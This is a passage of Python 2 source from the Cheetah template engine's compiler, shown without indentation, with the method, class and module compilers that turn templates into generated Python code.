signature = "def " + functionName + "(" + ','.join(argStringChunks) + "):"
self.addIndentingDirective(signature)
self.addChunk('#'+parserComment)
def addTry(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addExcept(self, expr, dedent=True, lineCol=None):
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addFinally(self, expr, dedent=True, lineCol=None):
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addReturn(self, expr):
assert not self._isGenerator
self.addChunk(expr)
self._hasReturnStatement = True
def addYield(self, expr):
assert not self._hasReturnStatement
self._isGenerator = True
if expr.replace('yield','').strip():
self.addChunk(expr)
else:
self.addChunk('if _dummyTrans:')
self.indent()
self.addChunk('yield trans.response().getvalue()')
self.addChunk('trans = DummyTransaction()')
self.addChunk('write = trans.response().write')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk(
'raise TypeError("This method cannot be called with a trans arg")')
self.dedent()
def addPass(self, expr):
self.addChunk(expr)
def addDel(self, expr):
self.addChunk(expr)
def addAssert(self, expr):
self.addChunk(expr)
def addRaise(self, expr):
self.addChunk(expr)
def addBreak(self, expr):
self.addChunk(expr)
def addContinue(self, expr):
self.addChunk(expr)
def addPSP(self, PSP):
self.commitStrConst()
autoIndent = False
if PSP[0] == '=':
PSP = PSP[1:]
if PSP:
self.addWriteChunk('_filter(' + PSP + ')')
return
elif PSP.lower() == 'end':
self.dedent()
return
elif PSP[-1] == '$':
autoIndent = True
PSP = PSP[:-1]
elif PSP[-1] == ':':
autoIndent = True
for line in PSP.splitlines():
self.addChunk(line)
if autoIndent:
self.indent()
def nextCacheID(self):
return ('_'+str(random.randrange(100, 999))
+ str(random.randrange(10000, 99999)))
def startCacheRegion(self, cacheInfo, lineCol, rawPlaceholder=None):
# @@TR: we should add some runtime logging to this
ID = self.nextCacheID()
interval = cacheInfo.get('interval',None)
test = cacheInfo.get('test',None)
customID = cacheInfo.get('id',None)
if customID:
ID = customID
varyBy = cacheInfo.get('varyBy', repr(ID))
self._cacheRegionsStack.append(ID) # attrib of current methodCompiler
# @@TR: add this to a special class var as well
self.addChunk('')
self.addChunk('## START CACHE REGION: ID='+ID+
'. line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_RECACHE_%(ID)s = False'%locals())
self.addChunk('_cacheRegion_%(ID)s = self.getCacheRegion(regionID='%locals()
+ repr(ID)
+ ', cacheInfo=%r'%cacheInfo
+ ')')
self.addChunk('if _cacheRegion_%(ID)s.isNew():'%locals())
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
self.addChunk('_cacheItem_%(ID)s = _cacheRegion_%(ID)s.getCacheItem('%locals()
+varyBy+')')
self.addChunk('if _cacheItem_%(ID)s.hasExpired():'%locals())
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
if test:
self.addChunk('if ' + test + ':')
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
self.addChunk('if (not _RECACHE_%(ID)s) and _cacheItem_%(ID)s.getRefreshTime():'%locals())
self.indent()
#self.addChunk('print "DEBUG"+"-"*50')
self.addChunk('try:')
self.indent()
self.addChunk('_output = _cacheItem_%(ID)s.renderOutput()'%locals())
self.dedent()
self.addChunk('except KeyError:')
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
#self.addChunk('print "DEBUG"+"*"*50')
self.dedent()
self.addChunk('else:')
self.indent()
self.addWriteChunk('_output')
self.addChunk('del _output')
self.dedent()
self.dedent()
self.addChunk('if _RECACHE_%(ID)s or not _cacheItem_%(ID)s.getRefreshTime():'%locals())
self.indent()
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('trans = _cacheCollector_%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _cacheCollector_%(ID)s.response().write'%locals())
if interval:
self.addChunk(("_cacheItem_%(ID)s.setExpiryTime(currentTime() +"%locals())
+ str(interval) + ")")
def endCacheRegion(self):
ID = self._cacheRegionsStack.pop()
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('_cacheData = _cacheCollector_%(ID)s.response().getvalue()'%locals())
self.addChunk('_cacheItem_%(ID)s.setData(_cacheData)'%locals())
self.addWriteChunk('_cacheData')
self.addChunk('del _cacheData')
self.addChunk('del _cacheCollector_%(ID)s'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
self.dedent()
self.addChunk('## END CACHE REGION: '+ID)
self.addChunk('')
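# Rough shape of the code generated for a #cache region (illustrative only; the
# _XXXXXXXX suffix stands for the random ID returned by nextCacheID()):
#
#     _RECACHE_XXXXXXXX = False
#     _cacheRegion_XXXXXXXX = self.getCacheRegion(regionID='...', cacheInfo={...})
#     if _cacheItem_XXXXXXXX.hasExpired(): _RECACHE_XXXXXXXX = True
#     ...
#     if _RECACHE_XXXXXXXX or not _cacheItem_XXXXXXXX.getRefreshTime():
#         trans = _cacheCollector_XXXXXXXX = DummyTransaction()
#     # collected output is later stored via _cacheItem_XXXXXXXX.setData(...)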
def nextCallRegionID(self):
return self.nextCacheID()
def startCallRegion(self, functionName, args, lineCol, regionTitle='CALL'):
class CallDetails: pass
callDetails = CallDetails()
callDetails.ID = ID = self.nextCallRegionID()
callDetails.functionName = functionName
callDetails.args = args
callDetails.lineCol = lineCol
callDetails.usesKeywordArgs = False
self._callRegionsStack.append((ID, callDetails)) # attrib of current methodCompiler
self.addChunk('## START %(regionTitle)s REGION: '%locals()
+ID
+' of '+functionName
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('_wasBuffering%(ID)s = self._CHEETAH__isBuffering'%locals())
self.addChunk('self._CHEETAH__isBuffering = True')
self.addChunk('trans = _callCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _callCollector%(ID)s.response().write'%locals())
def setCallArg(self, argName, lineCol):
ID, callDetails = self._callRegionsStack[-1]
if callDetails.usesKeywordArgs:
self._endCallArg()
else:
callDetails.usesKeywordArgs = True
self.addChunk('_callKws%(ID)s = {}'%locals())
self.addChunk('_currentCallArgname%(ID)s = %(argName)r'%locals())
callDetails.currentArgname = argName
def _endCallArg(self):
ID, callDetails = self._callRegionsStack[-1]
currCallArg = callDetails.currentArgname
self.addChunk(('_callKws%(ID)s[%(currCallArg)r] ='
' _callCollector%(ID)s.response().getvalue()')%locals())
self.addChunk('del _callCollector%(ID)s'%locals())
self.addChunk('trans = _callCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _callCollector%(ID)s.response().write'%locals())
def endCallRegion(self, regionTitle='CALL'):
ID, callDetails = self._callRegionsStack[-1]
functionName, initialKwArgs, lineCol = (
callDetails.functionName, callDetails.args, callDetails.lineCol)
def reset(ID=ID):
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('self._CHEETAH__isBuffering = _wasBuffering%(ID)s '%locals())
self.addChunk('del _wasBuffering%(ID)s'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
if not callDetails.usesKeywordArgs:
reset()
self.addChunk('_callArgVal%(ID)s = _callCollector%(ID)s.response().getvalue()'%locals())
self.addChunk('del _callCollector%(ID)s'%locals())
if initialKwArgs:
initialKwArgs = ', '+initialKwArgs
self.addFilteredChunk('%(functionName)s(_callArgVal%(ID)s%(initialKwArgs)s)'%locals())
self.addChunk('del _callArgVal%(ID)s'%locals())
else:
if initialKwArgs:
initialKwArgs = initialKwArgs+', '
self._endCallArg()
reset()
self.addFilteredChunk('%(functionName)s(%(initialKwArgs)s**_callKws%(ID)s)'%locals())
self.addChunk('del _callKws%(ID)s'%locals())
self.addChunk('## END %(regionTitle)s REGION: '%locals()
+ID
+' of '+functionName
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('')
self._callRegionsStack.pop() # attrib of current methodCompiler
def nextCaptureRegionID(self):
return self.nextCacheID()
def startCaptureRegion(self, assignTo, lineCol):
class CaptureDetails: pass
captureDetails = CaptureDetails()
captureDetails.ID = ID = self.nextCaptureRegionID()
captureDetails.assignTo = assignTo
captureDetails.lineCol = lineCol
self._captureRegionsStack.append((ID,captureDetails)) # attrib of current methodCompiler
self.addChunk('## START CAPTURE REGION: '+ID
+' '+assignTo
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('_wasBuffering%(ID)s = self._CHEETAH__isBuffering'%locals())
self.addChunk('self._CHEETAH__isBuffering = True')
self.addChunk('trans = _captureCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _captureCollector%(ID)s.response().write'%locals())
def endCaptureRegion(self):
ID, captureDetails = self._captureRegionsStack.pop()
assignTo, lineCol = (captureDetails.assignTo, captureDetails.lineCol)
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('self._CHEETAH__isBuffering = _wasBuffering%(ID)s '%locals())
self.addChunk('%(assignTo)s = _captureCollector%(ID)s.response().getvalue()'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
self.addChunk('del _captureCollector%(ID)s'%locals())
self.addChunk('del _wasBuffering%(ID)s'%locals())
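# Illustrative sketch (assumption): for '#capture foo', the region above buffers
# output into a DummyTransaction and finally assigns it back, roughly:
#     foo = _captureCollector_XXXXXXXX.response().getvalue()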
def setErrorCatcher(self, errorCatcherName):
self.turnErrorCatcherOn()
self.addChunk('if self._CHEETAH__errorCatchers.has_key("' + errorCatcherName + '"):')
self.indent()
self.addChunk('self._CHEETAH__errorCatcher = self._CHEETAH__errorCatchers["' +
errorCatcherName + '"]')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk('self._CHEETAH__errorCatcher = self._CHEETAH__errorCatchers["'
+ errorCatcherName + '"] = ErrorCatchers.'
+ errorCatcherName + '(self)'
)
self.dedent()
def nextFilterRegionID(self):
return self.nextCacheID()
def setFilter(self, theFilter, isKlass):
class FilterDetails: pass
filterDetails = FilterDetails()
filterDetails.ID = ID = self.nextFilterRegionID()
filterDetails.theFilter = theFilter
filterDetails.isKlass = isKlass
self._filterRegionsStack.append((ID, filterDetails)) # attrib of current methodCompiler
self.addChunk('_orig_filter%(ID)s = _filter'%locals())
if isKlass:
self.addChunk('_filter = self._CHEETAH__currentFilter = ' + theFilter.strip() +
'(self).filter')
else:
if theFilter.lower() == 'none':
self.addChunk('_filter = self._CHEETAH__initialFilter')
else:
# is string representing the name of a builtin filter
self.addChunk('filterName = ' + repr(theFilter))
self.addChunk('if self._CHEETAH__filters.has_key("' + theFilter + '"):')
self.indent()
self.addChunk('_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk('_filter = self._CHEETAH__currentFilter'
+' = \\\n\t\t\tself._CHEETAH__filters[filterName] = '
+ 'getattr(self._CHEETAH__filtersLib, filterName)(self).filter')
self.dedent()
def closeFilterBlock(self):
ID, filterDetails = self._filterRegionsStack.pop()
#self.addChunk('_filter = self._CHEETAH__initialFilter')
self.addChunk('_filter = _orig_filter%(ID)s'%locals())
class AutoMethodCompiler(MethodCompiler):
def _setupState(self):
MethodCompiler._setupState(self)
self._argStringList = [ ("self",None) ]
self._streamingEnabled = True
def _useKWsDictArgForPassingTrans(self):
alreadyHasTransArg = [argname for argname,defval in self._argStringList
if argname=='trans']
return (self.methodName()!='respond'
and not alreadyHasTransArg
and self.setting('useKWsDictArgForPassingTrans'))
def cleanupState(self):
MethodCompiler.cleanupState(self)
self.commitStrConst()
if self._cacheRegionsStack:
self.endCacheRegion()
if self._callRegionsStack:
self.endCallRegion()
if self._streamingEnabled:
kwargsName = None
positionalArgsListName = None
for argname,defval in self._argStringList:
if argname.strip().startswith('**'):
kwargsName = argname.strip().replace('**','')
break
elif argname.strip().startswith('*'):
positionalArgsListName = argname.strip().replace('*','')
if not kwargsName and self._useKWsDictArgForPassingTrans():
kwargsName = 'KWS'
self.addMethArg('**KWS', None)
self._kwargsName = kwargsName
if not self._useKWsDictArgForPassingTrans():
if not kwargsName and not positionalArgsListName:
self.addMethArg('trans', 'None')
else:
self._streamingEnabled = False
self._indentLev = self.setting('initialMethIndentLevel')
mainBodyChunks = self._methodBodyChunks
self._methodBodyChunks = []
self._addAutoSetupCode()
self._methodBodyChunks.extend(mainBodyChunks)
self._addAutoCleanupCode()
def _addAutoSetupCode(self):
if self._initialMethodComment:
self.addChunk(self._initialMethodComment)
if self._streamingEnabled:
if self._useKWsDictArgForPassingTrans() and self._kwargsName:
self.addChunk('trans = %s.get("trans")'%self._kwargsName)
self.addChunk('if (not trans and not self._CHEETAH__isBuffering'
' and not callable(self.transaction)):')
self.indent()
self.addChunk('trans = self.transaction'
' # is None unless self.awake() was called')
self.dedent()
self.addChunk('if not trans:')
self.indent()
self.addChunk('trans = DummyTransaction()')
if self.setting('autoAssignDummyTransactionToSelf'):
self.addChunk('self.transaction = trans')
self.addChunk('_dummyTrans = True')
self.dedent()
self.addChunk('else: _dummyTrans = False')
else:
self.addChunk('trans = DummyTransaction()')
self.addChunk('_dummyTrans = True')
self.addChunk('write = trans.response().write')
if self.setting('useNameMapper'):
argNames = [arg[0] for arg in self._argStringList]
allowSearchListAsMethArg = self.setting('allowSearchListAsMethArg')
if allowSearchListAsMethArg and 'SL' in argNames:
pass
elif allowSearchListAsMethArg and 'searchList' in argNames:
self.addChunk('SL = searchList')
else:
self.addChunk('SL = self._CHEETAH__searchList')
if self.setting('useFilters'):
self.addChunk('_filter = self._CHEETAH__currentFilter')
self.addChunk('')
self.addChunk("#" *40)
self.addChunk('## START - generated method body')
self.addChunk('')
def _addAutoCleanupCode(self):
self.addChunk('')
self.addChunk("#" *40)
self.addChunk('## END - generated method body')
self.addChunk('')
if not self._isGenerator:
self.addStop()
self.addChunk('')
def addStop(self, expr=None):
self.addChunk('return _dummyTrans and trans.response().getvalue() or ""')
def addMethArg(self, name, defVal=None):
self._argStringList.append( (name,defVal) )
def methodSignature(self):
argStringChunks = []
for arg in self._argStringList:
chunk = arg[0]
if not arg[1] == None:
chunk += '=' + arg[1]
argStringChunks.append(chunk)
argString = (', ').join(argStringChunks)
output = []
if self._decorator:
output.append(self._indent + self._decorator+'\n')
output.append(self._indent + "def "
+ self.methodName() + "(" +
argString + "):\n\n")
return ''.join(output)
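# Illustrative result (assumption, default settings): the main method signature
# rendered by methodSignature() typically looks like
#
#     def respond(self, trans=None):
#
# with '**KWS' added instead when useKWsDictArgForPassingTrans applies.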
##################################################
## CLASS COMPILERS
_initMethod_initCheetah = """\
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
""".replace('\n','\n'+' '*8)
class ClassCompiler(GenUtils):
methodCompilerClass = AutoMethodCompiler
methodCompilerClassForInit = MethodCompiler
def __init__(self, className, mainMethodName='respond',
moduleCompiler=None,
fileName=None,
settingsManager=None):
self._settingsManager = settingsManager
self._fileName = fileName
self._className = className
self._moduleCompiler = moduleCompiler
self._mainMethodName = mainMethodName
self._setupState()
methodCompiler = self._spawnMethodCompiler(
mainMethodName,
initialMethodComment='## CHEETAH: main method generated for this template')
self._setActiveMethodCompiler(methodCompiler)
if fileName and self.setting('monitorSrcFile'):
self._addSourceFileMonitoring(fileName)
def setting(self, key):
return self._settingsManager.setting(key)
def __getattr__(self, name):
"""Provide access to the methods and attributes of the MethodCompiler
at the top of the activeMethods stack: one-way namespace sharing
WARNING: use the explicit setter methods to assign attributes of the
MethodCompiler from methods of this class, or you will be assigning to
attributes of this object instead."""
if self.__dict__.has_key(name):
return self.__dict__[name]
elif hasattr(self.__class__, name):
return getattr(self.__class__, name)
elif self._activeMethodsList and hasattr(self._activeMethodsList[-1], name):
return getattr(self._activeMethodsList[-1], name)
else:
raise AttributeError, name
def _setupState(self):
self._classDef = None
self._decoratorForNextMethod = None
self._activeMethodsList = [] # stack while parsing/generating
self._finishedMethodsList = [] # stored in order
self._methodsIndex = {} # indexed by name
self._baseClass = 'Template'
self._classDocStringLines = []
# printed after methods in the gen class def:
self._generatedAttribs = ['_CHEETAH__instanceInitialized = False']
self._generatedAttribs.append('_CHEETAH_version = __CHEETAH_version__')
self._generatedAttribs.append(
'_CHEETAH_versionTuple = __CHEETAH_versionTuple__')
self._generatedAttribs.append('_CHEETAH_genTime = __CHEETAH_genTime__')
self._generatedAttribs.append('_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__')
self._generatedAttribs.append('_CHEETAH_src = __CHEETAH_src__')
self._generatedAttribs.append(
'_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__')
if self.setting('templateMetaclass'):
self._generatedAttribs.append('__metaclass__ = '+self.setting('templateMetaclass'))
self._initMethChunks = []
self._blockMetaData = {}
self._errorCatcherCount = 0
self._placeholderToErrorCatcherMap = {}
def cleanupState(self):
while self._activeMethodsList:
methCompiler = self._popActiveMethodCompiler()
self._swallowMethodCompiler(methCompiler)
self._setupInitMethod()
if self._mainMethodName == 'respond':
if self.setting('setup__str__method'):
self._generatedAttribs.append('def __str__(self): return self.respond()')
self.addAttribute('_mainCheetahMethod_for_' + self._className +
'= ' + repr(self._mainMethodName) )
def _setupInitMethod(self):
__init__ = self._spawnMethodCompiler('__init__',
klass=self.methodCompilerClassForInit)
__init__.setMethodSignature("def __init__(self, *args, **KWs)")
__init__.addChunk("%s.__init__(self, *args, **KWs)" % self._baseClass)
__init__.addChunk(_initMethod_initCheetah%{'className':self._className})
for chunk in self._initMethChunks:
__init__.addChunk(chunk)
__init__.cleanupState()
self._swallowMethodCompiler(__init__, pos=0)
def _addSourceFileMonitoring(self, fileName):
# @@TR: this stuff needs auditing for Cheetah 2.0
# the first bit is added to init
self.addChunkToInit('self._filePath = ' + repr(fileName))
self.addChunkToInit('self._fileMtime = ' + str(getmtime(fileName)) )
# the rest is added to the main output method of the class ('mainMethod')
self.addChunk('if exists(self._filePath) and ' +
'getmtime(self._filePath) > self._fileMtime:')
self.indent()
self.addChunk('self._compile(file=self._filePath, moduleName=' + repr(self._className) + ')')
self.addChunk(
'write(getattr(self, self._mainCheetahMethod_for_' + self._className +
')(trans=trans))')
self.addStop()
self.dedent()
def setClassName(self, name):
self._className = name
def className(self):
return self._className
def setBaseClass(self, baseClassName):
self._baseClass = baseClassName
def setMainMethodName(self, methodName):
if methodName == self._mainMethodName:
return
## change the name in the methodCompiler and add new reference
mainMethod = self._methodsIndex[self._mainMethodName]
mainMethod.setMethodName(methodName)
self._methodsIndex[methodName] = mainMethod
## make sure that fileUpdate code still works properly:
chunkToChange = ('write(self.' + self._mainMethodName + '(trans=trans))')
chunks = mainMethod._methodBodyChunks
if chunkToChange in chunks:
for i in range(len(chunks)):
if chunks[i] == chunkToChange:
chunks[i] = ('write(self.' + methodName + '(trans=trans))')
## get rid of the old reference and update self._mainMethodName
del self._methodsIndex[self._mainMethodName]
self._mainMethodName = methodName
def setMainMethodArgs(self, argsList):
mainMethodCompiler = self._methodsIndex[self._mainMethodName]
for argName, defVal in argsList:
mainMethodCompiler.addMethArg(argName, defVal)
def _spawnMethodCompiler(self, methodName, klass=None,
initialMethodComment=None):
if klass is None:
klass = self.methodCompilerClass
decorator = None
if self._decoratorForNextMethod:
decorator = self._decoratorForNextMethod
self._decoratorForNextMethod = None
methodCompiler = klass(methodName, classCompiler=self,
decorator=decorator,
initialMethodComment=initialMethodComment)
self._methodsIndex[methodName] = methodCompiler
return methodCompiler
def _setActiveMethodCompiler(self, methodCompiler):
self._activeMethodsList.append(methodCompiler)
def _getActiveMethodCompiler(self):
return self._activeMethodsList[-1]
def _popActiveMethodCompiler(self):
return self._activeMethodsList.pop()
def _swallowMethodCompiler(self, methodCompiler, pos=None):
methodCompiler.cleanupState()
if pos==None:
self._finishedMethodsList.append( methodCompiler )
else:
self._finishedMethodsList.insert(pos, methodCompiler)
return methodCompiler
def startMethodDef(self, methodName, argsList, parserComment):
methodCompiler = self._spawnMethodCompiler(
methodName, initialMethodComment=parserComment)
self._setActiveMethodCompiler(methodCompiler)
for argName, defVal in argsList:
methodCompiler.addMethArg(argName, defVal)
def _finishedMethods(self):
return self._finishedMethodsList
def addDecorator(self, decoratorExpr):
"""Set the decorator to be used with the next method in the source.
See _spawnMethodCompiler() and MethodCompiler for the details of how
this is used.
"""
self._decoratorForNextMethod = decoratorExpr
def addClassDocString(self, line):
self._classDocStringLines.append( line.replace('%','%%'))
def addChunkToInit(self,chunk):
self._initMethChunks.append(chunk)
def addAttribute(self, attribExpr):
## first test to make sure that the user hasn't used any fancy Cheetah syntax
# (placeholders, directives, etc.) inside the expression
if attribExpr.find('VFN(') != -1 or attribExpr.find('VFFSL(') != -1:
raise ParseError(self,
'Invalid #attr directive.' +
' It should only contain simple Python literals.')
## now add the attribute
self._generatedAttribs.append(attribExpr)
def addErrorCatcherCall(self, codeChunk, rawCode='', lineCol=''):
if self._placeholderToErrorCatcherMap.has_key(rawCode):
methodName = self._placeholderToErrorCatcherMap[rawCode]
if not self.setting('outputRowColComments'):
self._methodsIndex[methodName].addMethDocString(
'plus at line %s, col %s'%lineCol)
return methodName
self._errorCatcherCount += 1
methodName = '__errorCatcher' + str(self._errorCatcherCount)
self._placeholderToErrorCatcherMap[rawCode] = methodName
catcherMeth = self._spawnMethodCompiler(
methodName,
klass=MethodCompiler,
initialMethodComment=('## CHEETAH: Generated from ' + rawCode +
' at line %s, col %s'%lineCol + '.')
)
catcherMeth.setMethodSignature('def ' + methodName +
'(self, localsDict={})')
# is this use of localsDict right?
catcherMeth.addChunk('try:')
catcherMeth.indent()
catcherMeth.addChunk("return eval('''" + codeChunk +
"''', globals(), localsDict)")
catcherMeth.dedent()
catcherMeth.addChunk('except self._CHEETAH__errorCatcher.exceptions(), e:')
catcherMeth.indent()
catcherMeth.addChunk("return self._CHEETAH__errorCatcher.warn(exc_val=e, code= " +
repr(codeChunk) + " , rawCode= " +
repr(rawCode) + " , lineCol=" + str(lineCol) +")")
catcherMeth.cleanupState()
self._swallowMethodCompiler(catcherMeth)
return methodName
def closeDef(self):
self.commitStrConst()
methCompiler = self._popActiveMethodCompiler()
self._swallowMethodCompiler(methCompiler)
def closeBlock(self):
self.commitStrConst()
methCompiler = self._popActiveMethodCompiler()
methodName = methCompiler.methodName()
if self.setting('includeBlockMarkers'):
endMarker = self.setting('blockMarkerEnd')
methCompiler.addStrConst(endMarker[0] + methodName + endMarker[1])
self._swallowMethodCompiler(methCompiler)
#metaData = self._blockMetaData[methodName]
#rawDirective = metaData['raw']
#lineCol = metaData['lineCol']
## insert the code to call the block, caching if #cache directive is on
codeChunk = 'self.' + methodName + '(trans=trans)'
self.addChunk(codeChunk)
#self.appendToPrevChunk(' # generated from ' + repr(rawDirective) )
#if self.setting('outputRowColComments'):
# self.appendToPrevChunk(' at line %s, col %s' % lineCol + '.')
## code wrapping methods
def classDef(self):
if self._classDef:
return self._classDef
else:
return self.wrapClassDef()
__str__ = classDef
def wrapClassDef(self):
ind = self.setting('indentationStep')
classDefChunks = [self.classSignature(),
self.classDocstring(),
]
def addMethods():
classDefChunks.extend([
ind + '#'*50,
ind + '## CHEETAH GENERATED METHODS',
'\n',
self.methodDefs(),
])
def addAttributes():
classDefChunks.extend([
ind + '#'*50,
ind + '## CHEETAH GENERATED ATTRIBUTES',
'\n',
self.attributes(),
])
if self.setting('outputMethodsBeforeAttributes'):
addMethods()
addAttributes()
else:
addAttributes()
addMethods()
classDef = '\n'.join(classDefChunks)
self._classDef = classDef
return classDef
def classSignature(self):
return "class %s(%s):" % (self.className(), self._baseClass)
def classDocstring(self):
if not self._classDocStringLines:
return ''
ind = self.setting('indentationStep')
docStr = ('%(ind)s"""\n%(ind)s' +
'\n%(ind)s'.join(self._classDocStringLines) +
'\n%(ind)s"""\n'
) % {'ind':ind}
return docStr
def methodDefs(self):
methodDefs = [str(methGen) for methGen in self._finishedMethods() ]
return '\n\n'.join(methodDefs)
def attributes(self):
attribs = [self.setting('indentationStep') + str(attrib)
for attrib in self._generatedAttribs ]
return '\n\n'.join(attribs)
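# Hypothetical shape of a generated class, as assembled by wrapClassDef() above:
#
#     class MyTemplate(Template):
#         ##################################################
#         ## CHEETAH GENERATED METHODS
#         def respond(self, trans=None):
#             ...
#         ##################################################
#         ## CHEETAH GENERATED ATTRIBUTES
#         _CHEETAH__instanceInitialized = False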
class AutoClassCompiler(ClassCompiler):
pass
##################################################
## MODULE COMPILERS
class ModuleCompiler(SettingsManager, GenUtils):
parserClass = Parser
classCompilerClass = AutoClassCompiler
def __init__(self, source=None, file=None,
moduleName='DynamicallyCompiledCheetahTemplate',
mainClassName=None, # string
mainMethodName=None, # string
baseclassName=None, # string
extraImportStatements=None, # list of strings
settings=None # dict
):
SettingsManager.__init__(self)
if settings:
self.updateSettings(settings)
# disable useStackFrames if the C version of NameMapper isn't compiled
# it's painfully slow in the Python version and bites Windows users all
# the time:
if not NameMapper.C_VERSION:
if not sys.platform.startswith('java'):
warnings.warn(
"\nYou don't have the C version of NameMapper installed! "
"I'm disabling Cheetah's useStackFrames option as it is "
"painfully slow with the Python version of NameMapper. "
"You should get a copy of Cheetah with the compiled C version of NameMapper."
)
self.setSetting('useStackFrames', False)
self._compiled = False
self._moduleName = moduleName
if not mainClassName:
self._mainClassName = moduleName
else:
self._mainClassName = mainClassName
self._mainMethodNameArg = mainMethodName
if mainMethodName:
self.setSetting('mainMethodName', mainMethodName)
self._baseclassName = baseclassName
self._filePath = None
self._fileMtime = None
if source and file:
raise TypeError("Cannot compile from a source string AND file.")
elif isinstance(file, types.StringType) or isinstance(file, types.UnicodeType): # it's a filename.
f = open(file) # Raises IOError.
source = f.read()
f.close()
self._filePath = file
self._fileMtime = os.path.getmtime(file)
elif hasattr(file, 'read'):
source = file.read() # Can't set filename or mtime--they're not accessible.
elif file:
raise TypeError("'file' argument must be a filename string or file-like object")
if self._filePath:
self._fileDirName, self._fileBaseName = os.path.split(self._filePath)
self._fileBaseNameRoot, self._fileBaseNameExt = \
os.path.splitext(self._fileBaseName)
if not (isinstance(source, str) or isinstance(source, unicode)):
source = str( source )
# by converting to string here we allow objects such as other Templates
# to be passed in
# Handle the #indent directive by converting it to other directives.
# (Over the long term we'll make it a real directive.)
if source == "":
warnings.warn("You supplied an empty string for the source!", )
if source.find('#indent') != -1: #@@TR: undocumented hack
source = indentize(source)
self._parser = self.parserClass(source, filename=self._filePath, compiler=self)
self._setupCompilerState()
def __getattr__(self, name):
"""Provide one-way access to the methods and attributes of the
ClassCompiler, and thereby the MethodCompilers as well.
WARNING: use the explicit setter methods to assign attributes of the
ClassCompiler from methods of this class, or you will be assigning to
attributes of this object instead.
"""
if self.__dict__.has_key(name):
return self.__dict__[name]
elif hasattr(self.__class__, name):
return getattr(self.__class__, name)
elif self._activeClassesList and hasattr(self._activeClassesList[-1], name):
return getattr(self._activeClassesList[-1], name)
else:
raise AttributeError, name
def _initializeSettings(self):
self.updateSettings(copy.deepcopy(DEFAULT_COMPILER_SETTINGS))
def _setupCompilerState(self):
self._activeClassesList = []
self._finishedClassesList = [] # stored in order
self._finishedClassIndex = {} # indexed by name
self._moduleDef = None
self._moduleShBang = '#!/usr/bin/env python'
self._moduleEncoding = 'ascii'
self._moduleEncodingStr = ''
self._moduleHeaderLines = []
self._moduleDocStringLines = []
self._specialVars = {}
self._importStatements = [
"import sys",
"import os",
"import os.path",
"from os.path import getmtime, exists",
"import time",
"import types",
"import __builtin__",
"from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion",
"from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple",
"from Cheetah.Template import Template",
"from Cheetah.DummyTransaction import DummyTransaction",
"from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList",
"from Cheetah.CacheRegion import CacheRegion",
"import Cheetah.Filters as Filters",
"import Cheetah.ErrorCatchers as ErrorCatchers",
]
self._importedVarNames = ['sys',
'os',
'os.path',
'time',
'types',
'Template',
'DummyTransaction',
'NotFound',
'Filters',
'ErrorCatchers',
'CacheRegion',
]
self._moduleConstants = [
"try:",
" True, False",
"except NameError:",
" True, False = (1==1), (1==0)",
"VFFSL=valueFromFrameOrSearchList",
"VFSL=valueFromSearchList",
"VFN=valueForName",
"currentTime=time.time",
]
def compile(self):
classCompiler = self._spawnClassCompiler(self._mainClassName)
if self._baseclassName:
classCompiler.setBaseClass(self._baseclassName)
self._addActiveClassCompiler(classCompiler)
self._parser.parse()
self._swallowClassCompiler(self._popActiveClassCompiler())
self._compiled = True
self._parser.cleanup()
def _spawnClassCompiler(self, className, klass=None):
if klass is None:
klass = self.classCompilerClass
classCompiler = klass(className,
moduleCompiler=self,
mainMethodName=self.setting('mainMethodName'),
fileName=self._filePath,
settingsManager=self,
)
return classCompiler
def _addActiveClassCompiler(self, classCompiler):
self._activeClassesList.append(classCompiler)
def _getActiveClassCompiler(self):
return self._activeClassesList[-1]
def _popActiveClassCompiler(self):
return self._activeClassesList.pop()
def _swallowClassCompiler(self, classCompiler):
classCompiler.cleanupState()
self._finishedClassesList.append( classCompiler )
self._finishedClassIndex[classCompiler.className()] = classCompiler
return classCompiler
def _finishedClasses(self):
return self._finishedClassesList
def importedVarNames(self):
return self._importedVarNames
def addImportedVarNames(self, varNames):
self._importedVarNames.extend(varNames)
## methods for adding stuff to the module and class definitions
def setBaseClass(self, baseClassName):
if self._mainMethodNameArg:
self.setMainMethodName(self._mainMethodNameArg)
else:
self.setMainMethodName(self.setting('mainMethodNameForSubclasses'))
